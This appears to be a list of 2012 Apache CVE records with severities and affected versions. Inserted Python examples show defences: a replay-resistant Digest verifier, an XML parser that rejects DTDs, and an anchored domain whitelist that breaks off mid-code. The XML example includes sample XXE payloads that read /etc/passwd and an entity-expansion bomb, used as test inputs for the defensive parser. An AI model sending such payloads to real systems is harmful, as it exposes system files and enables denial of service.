The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 2.4.1
apache http_server 2.4.0
apache http_server 2.4.2
CVE-2012-3544 MEDIUM

Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-4449 HIGH

Apache Hadoop before 0.23.4, 1.x before 1.0.4, and 2.x before 2.0.2 generate token passwords using a 20-bit secret when Kerberos security features are enabled, which makes it easier for context-dependent attackers to crack secret keys via a brute-force attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-327,

Products Affected

Vendor Product Version
apache hadoop 1.0.3
apache hadoop 2.0.0
apache hadoop 1.0.1
apache hadoop 1.0.2
apache hadoop 2.0.2
apache hadoop 2.0.1
apache hadoop *
apache hadoop 1.0.0
CVE-2012-4460 MEDIUM

The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache qpid 0.10
apache qpid 0.17
apache qpid *
apache qpid 0.12
apache qpid 0.18
apache qpid 0.14
apache qpid 0.15
apache qpid 0.19
apache qpid 0.9
apache qpid 0.7
apache qpid 0.8
apache qpid 0.5
apache qpid 0.6
apache qpid 0.16
apache qpid 0.11
apache qpid 0.13
CVE-2012-4557 MEDIUM

The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.2.14
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.20
apache http_server 2.2.17
apache http_server 2.2.16
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.19
apache http_server 2.2.12
CVE-2012-4558 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.2.17
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.4.3
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.1
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.12
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.4.0
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.8
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
CVE-2012-5575 MEDIUM

Apache CXF 2.5.x before 2.5.10, 2.6.x before CXF 2.6.7, and 2.7.x before CXF 2.7.4 does not verify that a specified cryptographic algorithm is allowed by the WS-SecurityPolicy AlgorithmSuite definition before decrypting, which allows remote attackers to force CXF to use weaker cryptographic algorithms than intended and makes it easier to decrypt communications, aka "XML Encryption backwards compatibility attack."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.5.8
apache cxf 2.6.3
redhat jboss_enterprise_portal_platform 4.3.0
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.5.9
apache cxf 2.5.2
apache cxf 2.7.3
apache cxf 2.7.2
redhat jboss_fuse_esb_enterprise 7.1.0
redhat jboss_enterprise_soa_platform 4.3.0
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
redhat jboss_enterprise_web_platform 5.2.0
apache cxf 2.5.7
redhat jboss_enterprise_application_platform 5.0.0
CVE-2012-5616 LOW

Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.

CVSS 2.0

Severity: LOW

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache cloudstack 4.0.0
citrix cloudplatform *
CVE-2012-5633 MEDIUM

The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.3
apache cxf 2.6.0
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.5.3
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.2
CVE-2012-5636 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.22, 1.5.x before 1.5.10, and 6.x before 6.4.0 might allow remote attackers to inject arbitrary web script or HTML via vectors related to <script> tags in a rendered response.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket 1.4.2
apache wicket 1.4.20
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 6.2.0
apache wicket 1.4.12
apache wicket 1.5.9
apache wicket 6.1.1
apache wicket 1.4.0
apache wicket 1.5.4
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 6.0.0
apache wicket 1.5.1
apache wicket 1.5.8
apache wicket 1.4.10
apache wicket 1.4.18
apache wicket 1.5.2
apache wicket 1.5.5
apache wicket 6.1.0
apache wicket 6.3.0
apache wicket 1.4.21
apache wicket 1.5.3
apache wicket 1.5.6
apache wicket 1.4.8
apache wicket 1.5.7
apache wicket 1.4.17
apache wicket 1.5.0
apache wicket 1.4.7
apache wicket 1.4.19
CVE-2012-5639 MEDIUM

LibreOffice and OpenOffice automatically open embedded content.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
debian debian_linux 9.0
libreoffice libreoffice -
debian debian_linux 10.0
apache openoffice -
debian debian_linux 8.0
CVE-2012-5650 MEDIUM

Cross-site scripting (XSS) vulnerability in the Futon UI in Apache CouchDB before 1.0.4, 1.1.x before 1.1.2, and 1.2.x before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to the browser-based test suite.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache couchdb 1.2.0
apache couchdb *
apache couchdb 1.0.1
apache couchdb 1.1.1
apache couchdb 1.1.0
apache couchdb 1.0.2
apache couchdb 1.0.0
CVE-2012-5783 MEDIUM

Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache httpclient 3.1
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
CVE-2012-5784 MEDIUM

Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache axis 1.1
apache axis 1.2.1
paypal mass_pay -
apache activemq *
apache axis 1.2
apache axis *
apache axis -
apache axis 1.3
paypal transactional_information_soap -
paypal payments_pro -
apache axis 1.0
CVE-2012-5785 MEDIUM

Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache axis2 1.6.1
apache axis2 1.5.1
apache axis2 *
apache axis2 1.5.6
apache axis2 1.6
apache axis2 1.5.2
apache axis2 1.5.3
apache axis2 1.5.5
apache axis2 1.5.4
CVE-2012-5786 MEDIUM

The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF before 2.7.0 does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. NOTE: The vendor states that the sample had specifically used a flag to bypass the DN check.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf *
CVE-2012-5885 MEDIUM

The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 7.0.28
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-5886 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 7.0.28
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2012-5887 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 7.0.28
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.35
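The two Digest entries above (the session-caching issue described at the top of this section and CVE-2012-5887) share a root cause: the server verified the client's response hash without first enforcing nonce freshness and nonce-count ordering, so a request captured off the wire could be presented again. The following is an added illustration, not Tomcat's code, showing the order of checks a Digest verifier needs. The HMAC-based nonce format, SERVER_SECRET, NONCE_LIFETIME, the realm and the user store are assumptions made for the example.

```python
import hashlib
import hmac
import time

# Constructed values for the example; a real server generates the secret at
# startup and never ships it in configuration.
SERVER_SECRET = b"example-nonce-secret"
NONCE_LIFETIME = 300  # seconds a nonce stays valid
REALM = "example"


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_nonce(now: float) -> str:
    """nonce = '<timestamp>:<HMAC(secret, timestamp)>'. The tag lets the server
    confirm it issued the nonce without storing every nonce; the timestamp
    lets it decide staleness."""
    ts = str(int(now))
    tag = hmac.new(SERVER_SECRET, ts.encode(), hashlib.sha256).hexdigest()[:32]
    return f"{ts}:{tag}"


def nonce_is_fresh(nonce: str, now: float) -> bool:
    try:
        ts, tag = nonce.split(":", 1)
        age = now - int(ts)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, ts.encode(), hashlib.sha256).hexdigest()[:32]
    if not hmac.compare_digest(tag, expected):
        return False
    return 0 <= age <= NONCE_LIFETIME


def digest_response(username, password, method, uri, nonce, nc, cnonce):
    """RFC 2617 response for qop=auth, exactly as a client computes it."""
    ha1 = _md5(f"{username}:{REALM}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")


class DigestVerifier:
    def __init__(self, users):
        self.users = users      # username -> password (constructed sample store)
        self.highest_nc = {}    # nonce -> highest nonce-count already accepted

    def verify(self, fields, method, now):
        nonce = fields["nonce"]
        # Order matters: reject a stale or forged nonce before looking at the
        # credentials at all. Checking only the response hash would let a
        # sniffed request with a correct hash be accepted indefinitely.
        if not nonce_is_fresh(nonce, now):
            return False
        # Within the lifetime the nonce-count must strictly increase, so a
        # verbatim replay of a sniffed request (same nonce, same nc) fails.
        nc = int(fields["nc"], 16)
        if nc <= self.highest_nc.get(nonce, 0):
            return False
        password = self.users.get(fields["username"])
        if password is None:
            return False
        expected = digest_response(fields["username"], password, method,
                                   fields["uri"], nonce, fields["nc"],
                                   fields["cnonce"])
        if not hmac.compare_digest(expected, fields["response"]):
            return False
        self.highest_nc[nonce] = nc
        return True


def client_request(username, password, method, uri, nonce, nc, cnonce):
    """Assemble the fields a client would send in its Authorization header."""
    return {"username": username, "uri": uri, "nonce": nonce, "nc": nc,
            "cnonce": cnonce,
            "response": digest_response(username, password, method, uri,
                                        nonce, nc, cnonce)}


if __name__ == "__main__":
    now = time.time()
    v = DigestVerifier({"alice": "s3cret"})
    nonce = make_nonce(now)
    req = client_request("alice", "s3cret", "GET", "/private", nonce,
                         "00000001", "0a4f113b")
    print("first use:", v.verify(req, "GET", now))
    print("replayed:", v.verify(req, "GET", now + 1))
    req2 = client_request("alice", "s3cret", "GET", "/private", nonce,
                          "00000002", "0a4f113c")
    print("after nonce expiry:", v.verify(req2, "GET", now + NONCE_LIFETIME + 1))
```

The verifier keeps only the highest nonce-count per nonce; a production server would also bound that table by evicting nonces once they expire.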
CVE-2012-6092 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 4.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 4.1.1
CVE-2012-6107 MEDIUM

Apache Axis2/C does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache apache_axis2/c -
CVE-2012-6153 MEDIUM

http/conn/ssl/AbstractVerifier.java in Apache Commons HttpClient before 4.2.3 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5783.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache commons-httpclient *
CVE-2012-6551 MEDIUM

The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 4.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 4.1.1
CVE-2012-6612 HIGH

The (1) UpdateRequestHandler for XSLT or (2) XPathEntityProcessor in Apache Solr before 4.1 allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, different vectors than CVE-2013-6407.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache solr *
apache solr 4.0.0
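XXE issues like the Solr one above arise whenever a parser is handed untrusted XML with DTD processing left on. As an added example (not Solr's code), the parser below refuses any document that declares a DOCTYPE or an entity, which closes both external-entity fetches and entity-expansion denial of service in one check. The Solr-style sample documents are constructed for the example.

```python
import xml.parsers.expat


class DTDNotAllowed(ValueError):
    """Raised when the document carries a DOCTYPE or any entity declaration."""


def parse_without_dtd(xml_bytes: bytes):
    """Parse with expat but abort the moment a DOCTYPE or entity declaration
    appears, before any entity could be expanded or fetched. Returns the
    element start events as (tag, attributes) in document order."""
    parser = xml.parsers.expat.ParserCreate()
    events = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDNotAllowed(f"DOCTYPE {name!r} not allowed")

    def reject_entity(*_):
        raise DTDNotAllowed("entity declaration not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = lambda tag, attrs: events.append((tag, attrs))
    parser.Parse(xml_bytes, True)
    return events


def is_rejected(xml_bytes: bytes) -> bool:
    try:
        parse_without_dtd(xml_bytes)
    except DTDNotAllowed:
        return True
    return False


# Constructed samples: a benign update document, the same shape with an
# external entity declared and referenced, and an entity-expansion bomb.
BENIGN = b"<add><doc><field name='id'>1</field></doc></add>"
XXE = (b"<?xml version='1.0'?>"
       b"<!DOCTYPE add [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
       b"<add><doc><field name='id'>&xxe;</field></doc></add>")
BILLION = (b"<!DOCTYPE lolz [<!ENTITY a 'aaaaaaaaaa'>"
           b"<!ENTITY b '&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;'>]>"
           b"<x>&b;</x>")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE), ("billion", BILLION)):
        print(label, "rejected" if is_rejected(doc) else "accepted")
```

Rejecting the DTD outright is stricter than disabling external entities alone, and it is the right default for an ingest endpoint: no legitimate update document needs one.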
CVE-2012-6637 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier do not anchor the end of domain-name regular expressions, which allows remote attackers to bypass a whitelist protection mechanism via a domain name that contains an acceptable name as an initial substring.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
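The Cordova/PhoneGap entry above is the textbook unanchored-regex mistake: a pattern that only has to match at the start of the host accepts example.com.attacker.net as example.com. The following added example (not the project's code) builds both the flawed and the corrected matcher so the difference can be exercised; the whitelist entries and the single-label wildcard convention are assumptions for the example.

```python
import re
from urllib.parse import urlsplit


def compile_whitelist(domains, anchored=True):
    """Turn a list of allowed hosts into one regex. Literal names are escaped;
    a leading '*.' becomes a single-label wildcard. anchored=False reproduces
    the CVE-2012-6637 mistake: no trailing '$', so any host that merely
    begins with an allowed name is accepted."""
    alternatives = []
    for name in domains:
        name = name.lower()
        if name.startswith("*."):
            alternatives.append(r"[^.]+\." + re.escape(name[2:]))
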